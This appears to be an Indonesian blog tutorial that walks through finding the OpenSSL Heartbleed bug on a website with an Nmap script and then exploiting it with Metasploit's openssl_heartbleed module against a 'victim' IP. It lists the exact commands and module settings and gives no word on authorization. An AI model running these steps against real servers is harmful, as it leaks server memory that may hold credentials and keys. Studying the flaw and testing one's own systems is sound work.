Menjelang Ramadhan saya update tutorial Mendeteksi OpenSSL-HeartBleed & Exploiting with Metasploit.
Testing saya lakukan di Kali Linux. Tools :
1. Metasploit ( Terupdate )
2. Nmap ( Terupdate)
3. ssllabs ( optional )
Step by step :
1. Untuk mengetahui ada atau tidaknya bug heartbleed pada suatu website, lakukan scaning dengan menggunakan Nmap, sebelum itu pastikan Script heartbleed.nse sama tls.lua di nmap ada.
2. Sekarang Open your teminal and CD to /usr/share/namp.
3. Kemudian type : nmap -sV --script=ssl-heartbleed <ip victim>
4. Tunggu proses selesai, jika target vunlerable maka akan mucnul seperti ini
NB : Cara lain mendeteksi hearbleed silahkan cek URL nya di : https://www.ssllabs.com/ssltest/
5. Sekarang kita lanjut ke proses Exploitasi dengan menggunakan Metasploit, open your terminal and update your metasploit : msfupdate
6. Now open your metasploit : msfconsole
7. kemudian Search Modul Heartbleednya : search heartbleed
8. Terdapat 2 modul, type: " use auxiliary/scanner/ssl/openssl_heartbleed "
9. Langkah selanjutnya kita perlu set verbose ke true dan set rhostsnya
10. Langkah Terahir jalankan exploitnya dengan mengetikkan : run
NB : Bug heartbleed ini mengambil data secara random dari memory, jadi tidak ada jaminan anda akan menemukan data penting, data penting hanya didapatkan jika anda seganteng saya ... :p
Sekian dulu tutorial kali ini, kapan - kapan ane lanjut lagi ...
Salam Biawak X Code 
Tidak ada komentar